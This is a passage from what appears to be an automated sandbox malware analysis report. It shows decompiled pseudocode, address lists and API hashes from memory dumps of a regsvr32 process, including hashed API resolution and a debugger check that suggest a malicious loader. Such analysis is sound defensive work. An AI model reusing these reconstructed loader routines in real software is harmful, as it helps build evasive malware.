                          0x7ff88c08982b
                          0x7ff88c08982f
                          0x7ff88c08983b
                          0x7ff88c089840
                          0x7ff88c089844
                          0x7ff88c089848
                          0x7ff88c08984c
                          0x7ff88c089851
                          0x7ff88c08985e
                          0x7ff88c08986a
                          0x7ff88c089882
                          0x7ff88c089892
                          0x7ff88c0898ca

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: CriticalLeaveSection
                          • String ID:
                          • API String ID: 3988221542-0
                          • Opcode ID: 7f6c8debec4568f5d663e6eb499fe9acf8493300617c6ca9c171ea6707587096
                          • Instruction ID: 7d4be62021b95eaec3c4171f0659ada3f625aec123386295cc8ac1428be28703
                          • Opcode Fuzzy Hash: 7f6c8debec4568f5d663e6eb499fe9acf8493300617c6ca9c171ea6707587096
                          • Instruction Fuzzy Hash: 6E6135736086C1CAD761CF25E4447DAB7A4F798B88F044139DB8957B58DB38E994CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E003D6DF0(void* __ebx, void* __ecx, void* __esi, long long __rbx, intOrPtr* __rcx, signed long long __rdx) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t79;
                          				void* _t81;
                          				void* _t83;
                          				void* _t84;
                          				void* _t87;
                          				void* _t92;
                          				void* _t94;
                          				void* _t96;
                          				void* _t106;
                          				intOrPtr _t110;
                          				intOrPtr _t138;
                          				void* _t141;
                          				void* _t142;
                          				long long* _t153;
                          				long long* _t155;
                          				long long _t156;
                          				intOrPtr* _t194;
                          				long long** _t199;
                          				void* _t201;
                          				signed long long _t206;
                          				long long _t209;
                          				void* _t211;
                          				void* _t212;
                          				void* _t232;
                          				intOrPtr _t235;
                          				long long* _t242;
                          
                          				_t197 = __rdx;
                          				_t156 = __rbx;
                          				_t232 = _t211;
                          				 *((long long*)(_t232 + 8)) = __rbx;
                          				 *((long long*)(_t232 + 0x10)) = __rdx;
                          				_push(_t201);
                          				_t212 = _t211 - 0x40;
                          				r14d =  *0x3dd450;
                          				_t206 = __rdx;
                          				_t199 = __rcx;
                          				 *((long long*)(_t212 + 0x38)) =  *((intOrPtr*)( *0x3dd458 + 8));
                          				if(E003D91C8(__ebx, __rbx, __rdx, __rdx, __rcx, _t201, _t232 - 0x58, _t232 + 0x18, _t232) != 0) {
                          					L64:
                          					_t106 = 1;
                          					L65:
                          					return _t106;
                          				}
                          				_t247 =  *0x3dd458;
                          				_t235 =  *((intOrPtr*)(_t212 + 0x20));
                          				_t153 =  *((intOrPtr*)(__rcx));
                          				_t203 =  *((intOrPtr*)( *0x3dd458 + 8));
                          				 *((long long*)(_t212 + 0x98)) = _t153;
                          				 *((long long*)(_t212 + 0x30)) =  *((intOrPtr*)( *0x3dd458 + 8));
                          				if(_t235 == 0) {
                          					L41:
                          					_t106 = 0x57;
                          					L42:
                          					HeapFree();
                          					if(_t106 != 0) {
                          						goto L65;
                          					}
                          					if(E003D91C8(_t106, _t156, _t206, _t197, _t199, _t203, _t212 + 0x20, _t212 + 0x90, _t232) != 0) {
                          						goto L64;
                          					}
                          					_t79 = E003D672C(_t78, 0,  *((intOrPtr*)(_t212 + 0x20)), _t212 + 0x98);
                          					_t110 =  *((intOrPtr*)(_t212 + 0x98));
                          					if(_t79 != 0 || _t110 != 0) {
                          						 *((intOrPtr*)(_t199 + 0x28)) = _t110;
                          						if(E003D91C8(_t106, _t156, _t206, _t197, _t199, _t203, _t212 + 0x20, _t212 + 0x90, _t232) == 0) {
                          							_t241 =  *0x3dd458;
                          							_t46 = _t153 + 0x10; // 0x10
                          							_t106 = _t46;
                          							_t141 =  <  ?  *((void*)(_t212 + 0x90)) : _t106;
                          							_t87 = E003D908C(_t80, 0x4a75e5e7,  *((intOrPtr*)( *0x3dd458 + 0x10)));
                          							if(_t153 != 0) {
                          								_t87 =  *_t153();
                          							}
                          							_t197 =  *((intOrPtr*)(_t212 + 0x20));
                          							r8d = _t141;
                          							L003D47B0();
                          							if(_t141 < _t106) {
                          								r8d = _t106;
                          								L003D487A();
                          							}
                          							E003D908C(_t87, 0x8d72aad2,  *((intOrPtr*)(_t241 + 0x10)));
                          							if(_t153 != 0) {
                          								 *_t153();
                          							}
                          							HeapFree();
                          							_t206 =  *((intOrPtr*)(_t212 + 0x88));
                          						}
                          						r14d = r14d ^ 0x1a1a0866;
                          						_t81 = E003D91C8(_t106, _t156, _t206, _t197, _t199, _t203, _t212 + 0x20, _t212 + 0x90, _t232);
                          						_t106 = _t81;
                          						if(_t81 == 0 && E003D672C(_t81, 0,  *((intOrPtr*)(_t212 + 0x20)), _t212 + 0x98) != 0 &&  *((intOrPtr*)(_t212 + 0x98)) != 0) {
                          							_t204 =  *0x3dd458;
                          							_t83 = E003D908C(_t82, 0x4a75e5e7,  *((intOrPtr*)( *0x3dd458 + 0x10)));
                          							if(_t153 != 0) {
                          								_t83 =  *_t153();
                          							}
                          							_t84 = E003D908C(_t83, 0x9c66d81c,  *((intOrPtr*)(_t204 + 0x18)));
                          							if(_t153 != 0) {
                          								_t84 =  *_t153();
                          							}
                          							_t155 =  *((intOrPtr*)(_t212 + 0x28)) + _t206 * 0x23c34600;
                          							 *((long long*)(_t212 + 0x28)) = _t155;
                          							 *((long long*)(_t199 + 0x30)) = _t155;
                          							E003D908C(_t84, 0x8d72aad2,  *((intOrPtr*)(_t204 + 0x10)));
                          							if(_t155 != 0) {
                          								 *_t155();
                          							}
                          						}
                          						goto L65;
                          					} else {
                          						goto L64;
                          					}
                          				}
                          				r13d = 0xfb849f8f;
                          				E003D908C(_t75, r13d,  *((intOrPtr*)(_t247 + 0x18)));
                          				if(_t153 == 0) {
                          					_t92 = 0;
                          				} else {
                          					_t92 =  *_t153();
                          				}
                          				r8d = _t92 + 1;
                          				_t94 = HeapAlloc(??, ??, ??);
                          				_t203 = _t153;
                          				 *((long long*)(_t212 + 0x28)) = _t153;
                          				if(_t153 == 0) {
                          					_t106 = 8;
                          					goto L42;
                          				} else {
                          					_t197 = _t235;
                          					L003D47B0();
                          					_t184 =  *0x3dd458;
                          					_t209 = _t203;
                          					_t156 =  *((intOrPtr*)( *0x3dd458 + 8));
                          					while( *_t209 == 0x20 ||  *_t209 == 9) {
                          						_t209 = _t209 + 1;
                          					}
                          					if( *_t209 == 0) {
                          						_t142 = 0;
                          						L29:
                          						_t242 =  *((intOrPtr*)(_t212 + 0x90));
                          						L30:
                          						if(_t142 == 0) {
                          							HeapFree();
                          							_t206 =  *((intOrPtr*)(_t212 + 0x88));
                          							goto L41;
                          						}
                          						_t96 = E003D908C(_t94, 0x4a75e5e7,  *((intOrPtr*)(_t247 + 0x10)));
                          						if(_t153 != 0) {
                          							_t96 =  *_t153();
                          						}
                          						_t156 =  *((intOrPtr*)(_t199 + 0x40));
                          						 *((long long*)(_t199 + 0x40)) =  *((intOrPtr*)(_t212 + 0x28));
                          						 *((long long*)(_t199 + 0x48)) = _t242;
                          						 *((intOrPtr*)(_t199 + 0x50)) = sil;
                          						if( *((char*)(_t199 + 0x70)) != 0) {
                          							 *((char*)(_t199 + 0x70)) = 0;
                          						}
                          						asm("lock and dword [edi+0x2c], 0xfffffffe");
                          						E003D908C(_t96, 0x8d72aad2,  *((intOrPtr*)(_t247 + 0x10)));
                          						if(_t153 != 0) {
                          							 *_t153();
                          						}
                          						if(_t156 != 0) {
                          							_t156 =  *((intOrPtr*)(_t212 + 0x30));
                          							HeapFree(??, ??, ??);
                          							HeapFree(??, ??, ??);
                          						}
                          						_t235 =  *((intOrPtr*)(_t212 + 0x20));
                          						_t206 =  *((intOrPtr*)(_t212 + 0x88));
                          						_t106 = 0;
                          						goto L42;
                          					}
                          					E003D908C(_t94, r13d,  *((intOrPtr*)(_t184 + 0x18)));
                          					if(_t153 == 0) {
                          					} else {
                          						 *_t153();
                          					}
                          					asm("cdq");
                          					_t15 = _t153 + 1; // 0x1
                          					r8d = _t15;
                          					_t94 = HeapAlloc(??, ??, ??);
                          					_t142 = 0;
                          					_t242 = _t153;
                          					if(_t153 == 0) {
                          						goto L29;
                          					} else {
                          						do {
                          							_t138 =  *_t209;
                          							_t194 = _t209;
                          							if(_t138 == 0) {
                          								L20:
                          								L21:
                          								if(_t194 == 0) {
                          									goto L26;
                          								}
                          								 *_t194 = 0;
                          								_t194 = _t194 + 1;
                          								while( *_t194 == 0x20 ||  *_t194 == 9) {
                          									_t194 = _t194 + 1;
                          								}
                          								goto L26;
                          							}
                          							while(_t138 != 0x20) {
                          								_t194 = _t194 + 1;
                          								_t138 =  *_t194;
                          								if(_t138 != 0) {
                          									continue;
                          								}
                          								break;
                          							}
                          							if(_t138 != 0) {
                          								goto L21;
                          							}
                          							goto L20;
                          							L26:
                          							 *_t153 = _t209;
                          							_t142 = _t142 + 1;
                          							_t153 = _t153 + _t156;
                          							_t209 = _t194;
                          						} while (_t194 != 0);
                          						goto L30;
                          					}
                          				}
                          			}
































                          0x003d6df0
                          0x003d6df0
                          0x003d6df0
                          0x003d6df3
                          0x003d6df7
                          0x003d6dfc
                          0x003d6e06
                          0x003d6e11
                          0x003d6e18
                          0x003d6e22
                          0x003d6e36
                          0x003d6e42
                          0x003d7239
                          0x003d7239
                          0x003d723e
                          0x003d7257
                          0x003d7257
                          0x003d6e48
                          0x003d6e4f
                          0x003d6e54
                          0x003d6e57
                          0x003d6e5b
                          0x003d6e63
                          0x003d6e6b
                          0x003d703b
                          0x003d703b
                          0x003d7040
                          0x003d704d
                          0x003d7055
                          0x00000000
                          0x00000000
                          0x003d707b
                          0x00000000
                          0x00000000
                          0x003d7090
                          0x003d7095
                          0x003d709e
                          0x003d70ab
                          0x003d70cb
                          0x003d70d1
                          0x003d70db
                          0x003d70db
                          0x003d70eb
                          0x003d70f8
                          0x003d7100
                          0x003d7107
                          0x003d7107
                          0x003d7109
                          0x003d7112
                          0x003d7117
                          0x003d711e
                          0x003d712c
                          0x003d712f
                          0x003d712f
                          0x003d713d
                          0x003d7145
                          0x003d714c
                          0x003d714c
                          0x003d7158
                          0x003d715e
                          0x003d715e
                          0x003d7166
                          0x003d7180
                          0x003d7185
                          0x003d7189
                          0x003d71ba
                          0x003d71cd
                          0x003d71d5
                          0x003d71dc
                          0x003d71dc
                          0x003d71e7
                          0x003d71ef
                          0x003d71f6
                          0x003d71f6
                          0x003d720c
                          0x003d720f
                          0x003d7214
                          0x003d721c
                          0x003d7224
                          0x003d722b
                          0x003d722b
                          0x003d7224
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d709e
                          0x003d6e75
                          0x003d6e7e
                          0x003d6e86
                          0x003d6e8f
                          0x003d6e88
                          0x003d6e8b
                          0x003d6e8b
                          0x003d6e98
                          0x003d6e9d
                          0x003d6ea3
                          0x003d6ea6
                          0x003d6eae
                          0x003d722f
                          0x00000000
                          0x003d6eb4
                          0x003d6eb7
                          0x003d6ebd
                          0x003d6ec2
                          0x003d6ec9
                          0x003d6ecc
                          0x003d6ed0
                          0x003d6edc
                          0x003d6edc
                          0x003d6ee5
                          0x003d6f74
                          0x003d6f76
                          0x003d6f76
                          0x003d6f7e
                          0x003d6f80
                          0x003d702d
                          0x003d7033
                          0x00000000
                          0x003d7033
                          0x003d6f8f
                          0x003d6f9f
                          0x003d6fa6
                          0x003d6fa6
                          0x003d6fad
                          0x003d6fb5
                          0x003d6fb9
                          0x003d6fbd
                          0x003d6fc5
                          0x003d6fc7
                          0x003d6fc7
                          0x003d6fcb
                          0x003d6fd9
                          0x003d6fe1
                          0x003d6fe8
                          0x003d6fe8
                          0x003d6fed
                          0x003d6ff2
                          0x003d6ffc
                          0x003d700a
                          0x003d700a
                          0x003d7010
                          0x003d7015
                          0x003d701d
                          0x00000000
                          0x003d701d
                          0x003d6ef2
                          0x003d6efa
                          0x003d6efc
                          0x003d6eff
                          0x003d6eff
                          0x003d6f05
                          0x003d6f0f
                          0x003d6f0f
                          0x003d6f17
                          0x003d6f1d
                          0x003d6f1f
                          0x003d6f25
                          0x00000000
                          0x003d6f27
                          0x003d6f2a
                          0x003d6f2a
                          0x003d6f2d
                          0x003d6f32
                          0x003d6f46
                          0x003d6f48
                          0x003d6f4b
                          0x00000000
                          0x00000000
                          0x003d6f4d
                          0x003d6f50
                          0x003d6f53
                          0x003d6f5d
                          0x003d6f5d
                          0x00000000
                          0x003d6f53
                          0x003d6f34
                          0x003d6f39
                          0x003d6f3c
                          0x003d6f40
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d6f40
                          0x003d6f44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d6f62
                          0x003d6f62
                          0x003d6f65
                          0x003d6f67
                          0x003d6f6a
                          0x003d6f6d
                          0x00000000
                          0x003d6f72
                          0x003d6f25

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID: uJ$uJ$uJ
                          • API String ID: 1659099196-303439786
                          • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction ID: 0f5d3061d8b044fc7f23307dd1ff5068a4c7f21596788c445c2f7eaf7979094d
                          • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction Fuzzy Hash: C6B1D123704B8186DB22DF62F4443AA6364FBC8B84F498427EE9E47755EF38C94AC740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 28%
                          			E003D5638(void* __eax, void* __ecx, void* __edi, void* __ebp, long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                          				void* __rbp;
                          				void* _t86;
                          				void* _t87;
                          				signed long long _t88;
                          				void* _t97;
                          				void* _t99;
                          				intOrPtr _t106;
                          				void* _t107;
                          				signed long long _t109;
                          				void* _t122;
                          				signed long long _t123;
                          				signed long long _t132;
                          				void* _t137;
                          				intOrPtr _t138;
                          				intOrPtr _t163;
                          				void* _t164;
                          				void* _t185;
                          				long long _t186;
                          				long long _t188;
                          				long long _t190;
                          				long long* _t192;
                          				long long _t230;
                          				void* _t235;
                          				long long _t244;
                          				long long _t245;
                          				void* _t246;
                          				void* _t247;
                          				long long _t269;
                          				void* _t270;
                          				long long _t272;
                          
                          				_t228 = __rdx;
                          				_t190 = __rbx;
                          				_t164 = __ebp;
                          				_t137 = __ecx;
                          				_t185 = _t246;
                          				 *((long long*)(_t185 + 0x10)) = __rbx;
                          				 *((intOrPtr*)(_t185 + 0x20)) = r9d;
                          				 *((long long*)(_t185 + 0x18)) = __r8;
                          				 *((long long*)(_t185 + 8)) = __rcx;
                          				_push(_t235);
                          				_push(_t270);
                          				_t247 = _t246 - 0x50;
                          				_t242 =  *0x3dd458;
                          				_t186 =  *0x3dd448;
                          				 *((long long*)(_t247 + 0x38)) = _t186;
                          				_t163 = 0;
                          				_t86 = E003D908C(__eax, 0x38e683e4,  *((intOrPtr*)( *0x3dd458 + 0x18)));
                          				if(_t186 != _t235) {
                          					_t9 = _t235 + 0xa; // 0xa
                          					_t137 = _t9;
                          					_t86 =  *_t186();
                          				}
                          				_t87 = E003D908C(_t86, 0x9c66d81c,  *((intOrPtr*)(_t242 + 0x18)));
                          				if(_t186 != _t235) {
                          					_t87 =  *_t186();
                          				}
                          				_t12 = _t247 + 0x30; // -126
                          				_t88 = E003D5BA4(_t87, _t12);
                          				_t13 = _t247 + 0x30; // -126
                          				r11d = _t88;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t97 = E003D13EC(_t137, _t186, _t190, _t13, _t228);
                          				 *((long long*)(_t247 + 0x40)) = _t186;
                          				if(_t186 != _t235) {
                          					r12d = 0xfb849f8f;
                          					_t99 = E003D908C(_t97, r12d,  *((intOrPtr*)(_t242 + 0x18)));
                          					if(_t186 != _t235) {
                          						_t99 =  *_t186();
                          					}
                          					E003D908C(_t99, r12d,  *((intOrPtr*)(_t242 + 0x18)));
                          					if(_t186 == _t235) {
                          						r13d = _t163;
                          					} else {
                          						r13d =  *_t186();
                          					}
                          					_t23 = _t190 + 7; // 0x7
                          					r8d = _t270 + _t23;
                          					HeapAlloc(??, ??, ??);
                          					_t269 = _t186;
                          					if(_t186 != _t235) {
                          						_t24 = _t190 + 1; // 0x1
                          						r8d = _t24;
                          						L003D47B0();
                          						if( *((intOrPtr*)(_t247 + 0xa0)) != _t235 &&  *((intOrPtr*)(_t247 + 0xa8)) != _t163) {
                          							_t186 =  *((intOrPtr*)(_t247 + 0x38));
                          							r8d = 6;
                          							L003D47B0();
                          							_t32 = _t270 + 1; // 0x1
                          							r8d = _t32;
                          							L003D47B0();
                          						}
                          						_t230 = _t269;
                          						if(E003DA238(_t137, 0, _t164, _t190,  *((intOrPtr*)(_t247 + 0x90)), _t230, _t247 + 0x48) == _t163) {
                          							_t192 =  *((intOrPtr*)(_t247 + 0xb0));
                          							 *_t192 =  *((intOrPtr*)(_t247 + 0x48));
                          							E003D908C(_t103, 0xfb849f8f,  *((intOrPtr*)(_t242 + 0x18)));
                          							if(_t186 == _t235) {
                          								_t106 = _t163;
                          							} else {
                          								_t106 =  *_t186();
                          							}
                          							 *((intOrPtr*)(_t192 + 0x10)) = _t106;
                          							_t41 = _t230 + 0x34; // 0x34
                          							r8d = _t41;
                          							 *((intOrPtr*)(_t192 + 0x14)) = 1;
                          							_t107 = HeapAlloc(??, ??, ??);
                          							_t272 = _t186;
                          							if(_t186 == _t235) {
                          								L30:
                          								goto L31;
                          							} else {
                          								_t43 = _t247 + 0x30; // 0xfb849fcf
                          								_t109 = E003D5BA4(_t107, _t43);
                          								_t44 = _t247 + 0x30; // 0xfb849fcf
                          								r11d = _t109;
                          								r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          								E003D13EC(_t137, _t186, _t192, _t44, _t230);
                          								_t244 = _t186;
                          								if(_t186 == _t235) {
                          									L29:
                          									HeapFree();
                          									goto L30;
                          								} else {
                          									L003DB158();
                          									HeapFree(??, ??, ??);
                          									_t231 =  *((intOrPtr*)(_t247 + 0xa0));
                          									 *((long long*)(_t192 + 8)) = _t272;
                          									if( *((intOrPtr*)(_t247 + 0xa0)) == _t235) {
                          										L35:
                          										_t163 = 1;
                          									} else {
                          										_t138 =  *((intOrPtr*)(_t247 + 0xa8));
                          										if(_t138 == _t163) {
                          											goto L35;
                          										} else {
                          											r8d = _t138;
                          											_t188 = _t192 + 0x28;
                          											 *((long long*)(_t247 + 0x20)) = _t188;
                          											if(E003D7CF4(_t138, _t188, _t192,  *((intOrPtr*)(_t247 + 0x90)), _t231, _t244, _t192 + 0x18) != _t163) {
                          												goto L29;
                          											} else {
                          												r15d = 0x77;
                          												 *((intOrPtr*)(_t192 + 0x2c)) = 1;
                          												_t122 = HeapAlloc(??, ??, ??);
                          												_t245 = _t188;
                          												if(_t188 == _t235) {
                          													L28:
                          													goto L29;
                          												} else {
                          													_t62 = _t247 + 0x30; // 0xfb849fcf
                          													_t123 = E003D5BA4(_t122, _t62);
                          													_t63 = _t247 + 0x30; // 0xfb849fcf
                          													r11d = _t123;
                          													r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          													_t132 = E003D13EC(_t138, _t188, _t192, _t63, _t231);
                          													 *((long long*)(_t247 + 0x48)) = _t188;
                          													if(_t188 == _t235) {
                          														HeapFree();
                          														goto L28;
                          													} else {
                          														L003DB158();
                          														r11d = _t132;
                          														r15d = r15d - r11d;
                          														 *((long long*)(_t247 + 0x20)) =  *((intOrPtr*)(_t247 + 0x38)) + 0x3e129f;
                          														L003DB158();
                          														 *((long long*)(_t192 + 0x20)) = _t245;
                          														_t163 = 2;
                          													}
                          												}
                          											}
                          											L31:
                          											HeapFree();
                          										}
                          									}
                          								}
                          							}
                          						}
                          						HeapFree();
                          					}
                          					HeapFree();
                          				}
                          				return _t163;
                          			}

































                          0x003d5638
                          0x003d5638
                          0x003d5638
                          0x003d5638
                          0x003d5638
                          0x003d563b
                          0x003d563f
                          0x003d5643
                          0x003d5647
                          0x003d564d
                          0x003d5650
                          0x003d5656
                          0x003d565a
                          0x003d5661
                          0x003d5678
                          0x003d567d
                          0x003d567f
                          0x003d5687
                          0x003d568c
                          0x003d568c
                          0x003d568f
                          0x003d568f
                          0x003d569a
                          0x003d56a2
                          0x003d56a9
                          0x003d56a9
                          0x003d56ab
                          0x003d56b0
                          0x003d56b5
                          0x003d56ba
                          0x003d56d4
                          0x003d56db
                          0x003d56e3
                          0x003d56eb
                          0x003d56f5
                          0x003d56fe
                          0x003d5706
                          0x003d570b
                          0x003d570d
                          0x003d571a
                          0x003d5722
                          0x003d572e
                          0x003d5724
                          0x003d5729
                          0x003d5729
                          0x003d5731
                          0x003d5731
                          0x003d573b
                          0x003d5741
                          0x003d5747
                          0x003d574d
                          0x003d574d
                          0x003d5757
                          0x003d576b
                          0x003d5776
                          0x003d577b
                          0x003d578d
                          0x003d5792
                          0x003d5792
                          0x003d579e
                          0x003d579e
                          0x003d57b0
                          0x003d57ba
                          0x003d57c0
                          0x003d57d2
                          0x003d57d9
                          0x003d57e1
                          0x003d57ea
                          0x003d57e3
                          0x003d57e6
                          0x003d57e6
                          0x003d57f1
                          0x003d57f4
                          0x003d57f4
                          0x003d57f8
                          0x003d57ff
                          0x003d5805
                          0x003d580b
                          0x003d59b6
                          0x00000000
                          0x003d5811
                          0x003d5811
                          0x003d5816
                          0x003d581b
                          0x003d5820
                          0x003d583a
                          0x003d5841
                          0x003d5846
                          0x003d584c
                          0x003d59a8
                          0x003d59b0
                          0x00000000
                          0x003d5852
                          0x003d5871
                          0x003d587e
                          0x003d5884
                          0x003d588c
                          0x003d5893
                          0x003d59fa
                          0x003d59fa
                          0x003d5899
                          0x003d5899
                          0x003d58a2
                          0x00000000
                          0x003d58a8
                          0x003d58a8
                          0x003d58b3
                          0x003d58bb
                          0x003d58c7
                          0x00000000
                          0x003d58cd
                          0x003d58cd
                          0x003d58db
                          0x003d58e2
                          0x003d58e8
                          0x003d58ee
                          0x003d59a3
                          0x00000000
                          0x003d58f4
                          0x003d58f4
                          0x003d58f9
                          0x003d58fe
                          0x003d5903
                          0x003d591d
                          0x003d5924
                          0x003d5929
                          0x003d5931
                          0x003d599d
                          0x00000000
                          0x003d5933
                          0x003d5950
                          0x003d595d
                          0x003d5968
                          0x003d5970
                          0x003d5980
                          0x003d598a
                          0x003d598e
                          0x003d598e
                          0x003d5931
                          0x003d58ee
                          0x003d59b9
                          0x003d59be
                          0x003d59be
                          0x003d58a2
                          0x003d5893
                          0x003d584c
                          0x003d580b
                          0x003d59cc
                          0x003d59cc
                          0x003d59da
                          0x003d59da
                          0x003d59f9

                          APIs
                            • Part of subcall function 003D908C: SetLastError.KERNEL32 ref: 003D90C8
                          • HeapAlloc.KERNEL32 ref: 003D573B
                          • HeapAlloc.KERNEL32 ref: 003D57FF
                            • Part of subcall function 003D13EC: HeapAlloc.KERNEL32 ref: 003D1456
                          • HeapFree.KERNEL32 ref: 003D587E
                            • Part of subcall function 003D7CF4: HeapAlloc.KERNEL32 ref: 003D7DB2
                          • HeapAlloc.KERNEL32 ref: 003D58E2
                          • HeapFree.KERNEL32 ref: 003D599D
                          • HeapFree.KERNEL32 ref: 003D59B0
                          • HeapFree.KERNEL32 ref: 003D59BE
                          • HeapFree.KERNEL32 ref: 003D59CC
                          • HeapFree.KERNEL32 ref: 003D59DA
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction ID: dc65b55282c8ead28c69fab707a58c8bd990b376f43de90ddbcaafeb3844c2bb
                          • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction Fuzzy Hash: DE91B136324E8186CB16DB26F45039AA7A6F7C9BC4F558113EE4E87B18DF38CA45C740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00007FF87FF88C07E374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                          				void* __rdi;
                          				void* _t36;
                          				int _t40;
                          				void* _t43;
                          				void* _t44;
                          				intOrPtr _t52;
                          				signed long long _t62;
                          				long long _t65;
                          				_Unknown_base(*)()* _t85;
                          				void* _t89;
                          				void* _t90;
                          				void* _t92;
                          				signed long long _t93;
                          				struct _EXCEPTION_POINTERS* _t99;
                          
                          				_t45 = __ecx;
                          				 *((long long*)(_t92 + 0x10)) = __rbx;
                          				 *((long long*)(_t92 + 0x18)) = __rsi;
                          				_t3 = _t92 - 0x4f0; // -1288
                          				_t90 = _t3;
                          				_t93 = _t92 - 0x5f0;
                          				_t62 =  *0x8c0b3760; // 0x91a6ae42c18b
                          				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                          				_t52 = r8d;
                          				_t44 = __ecx;
                          				if (__ecx == 0xffffffff) goto 0x8c07e3b3;
                          				E00007FF87FF88C07BC04(_t36);
                          				_t5 = _t93 + 0x70; // 0x58
                          				r8d = 0x98;
                          				E00007FF87FF88C07C440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
                          				_t6 = _t90 + 0x10; // -1272
                          				r8d = 0x4d0;
                          				E00007FF87FF88C07C440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
                          				_t7 = _t93 + 0x70; // 0x58
                          				 *((long long*)(_t93 + 0x48)) = _t7;
                          				_t10 = _t90 + 0x10; // -1272
                          				_t65 = _t10;
                          				 *((long long*)(_t93 + 0x50)) = _t65;
                          				__imp__RtlCaptureContext();
                          				r8d = 0;
                          				__imp__RtlLookupFunctionEntry();
                          				if (_t65 == 0) goto 0x8c07e446;
                          				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                          				_t16 = _t93 + 0x60; // 0x48
                          				 *((long long*)(_t93 + 0x30)) = _t16;
                          				_t19 = _t93 + 0x58; // 0x40
                          				 *((long long*)(_t93 + 0x28)) = _t19;
                          				_t21 = _t90 + 0x10; // -1272
                          				 *((long long*)(_t93 + 0x20)) = _t21;
                          				__imp__RtlVirtualUnwind();
                          				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                          				_t25 = _t90 + 0x508; // 0x0
                          				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                          				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
                          				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                          				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
                          				_t40 = IsDebuggerPresent();
                          				SetUnhandledExceptionFilter(_t85, _t89);
                          				if (UnhandledExceptionFilter(_t99) != 0) goto 0x8c07e4a8;
                          				if (_t40 != 0) goto 0x8c07e4a8;
                          				if (_t44 == 0xffffffff) goto 0x8c07e4a8;
                          				_t43 = E00007FF87FF88C07BC04(_t42);
                          				E00007FF87FF88C086D80();
                          				return _t43;
                          			}

















                          0x7ff88c07e374
                          0x7ff88c07e374
                          0x7ff88c07e379
                          0x7ff88c07e382
                          0x7ff88c07e382
                          0x7ff88c07e38a
                          0x7ff88c07e391
                          0x7ff88c07e39b
                          0x7ff88c07e3a2
                          0x7ff88c07e3a7
                          0x7ff88c07e3ac
                          0x7ff88c07e3ae
                          0x7ff88c07e3b5
                          0x7ff88c07e3ba
                          0x7ff88c07e3c0
                          0x7ff88c07e3c7
                          0x7ff88c07e3cb
                          0x7ff88c07e3d1
                          0x7ff88c07e3d6
                          0x7ff88c07e3db
                          0x7ff88c07e3e4
                          0x7ff88c07e3e4
                          0x7ff88c07e3e8
                          0x7ff88c07e3ed
                          0x7ff88c07e402
                          0x7ff88c07e405
                          0x7ff88c07e40e
                          0x7ff88c07e410
                          0x7ff88c07e416
                          0x7ff88c07e423
                          0x7ff88c07e42b
                          0x7ff88c07e430
                          0x7ff88c07e435
                          0x7ff88c07e439
                          0x7ff88c07e440
                          0x7ff88c07e44d
                          0x7ff88c07e454
                          0x7ff88c07e45f
